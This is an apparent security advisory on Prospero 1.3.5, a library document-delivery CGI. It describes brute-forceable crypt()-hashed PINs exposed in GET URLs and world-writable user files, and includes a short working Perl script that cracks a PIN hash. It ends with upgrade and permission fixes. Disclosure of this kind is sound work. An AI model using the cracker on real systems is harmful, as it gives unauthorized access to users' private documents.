COMMAND

    Prospero

SYSTEMS AFFECTED

    Prospero 1.3.5 CGI

PROBLEM

    'darkyoda'  found  following.   Prospero  is  a Web-based document
    delivery system  designed as  a complement  to the  Ariel software
    system.  Ariel is a product of the Research Libraries Group  (RLG)
    which allows libraries to  use the Internet to  exchange documents
    through interlibrary loan.

    Client-side Prospero  generates a  random 3  or 4  digit PIN  that
    users  enter  into  a  web-based  form  that grants them access to
    documents requested through interlibrary  loan.  Because the  form
    uses the GET method, the encrypted PIN is visible in the  browser.
    A perusal of login.pl reveals that the Perl crypt() method is used
    to encrypt the PIN.   It is trivial for  an attacker to  determine
    the PIN by  brute-force methods; this  would allow access  to user
    documents, allowing malicious users to delete them arbitrarily  or
    to determine the subject of a user's research.

    In addition, login.pl  uses 0666 permissions  on log and  manifest
    files.  The manifest file is the user database containing PINs and
    usernames.  Non-prospero users  can modify/delete entries in  this
    file as they please.

    Exploit:

    #!/usr/bin/perl
    #
    # crack for prospero PINs
    # dY 12.15.00
    #
    printf("Enter encrypted PIN: ");
    chop($passwd = <STDIN>);
    
    $salt = substr($passwd,0,2);
    $epin = substr($passwd,2,99);
    
    $lowval = 0;
    $highval = 9999;
    
    for ($i = $lowval; $i <= $highval; $i++) {
            if (crypt($i, $salt) eq $passwd) {
                    print("***Unencrypted PIN is: $i\n");
                    exit(0);
                    }
            }
    printf("Sorry, couldn't crack it. Try something > $highval.\n");
    exit(0);

SOLUTION

    Upgrade to  the latest  version 1.3.7.   Note that  author  didn't
    reviewed the source  of this latest  version.  Clients  who cannot
    upgrade should  change the  file permissions  in login.pl  to 0660
    and consider using complex alphanumeric  PINs in lieu of the  ones
    generated  by  Prospero.   Note  that  this  will  only  slow   an
    attacker, as the hash could still be brute-forced by an industrial
    password cracker, ala John the Ripper.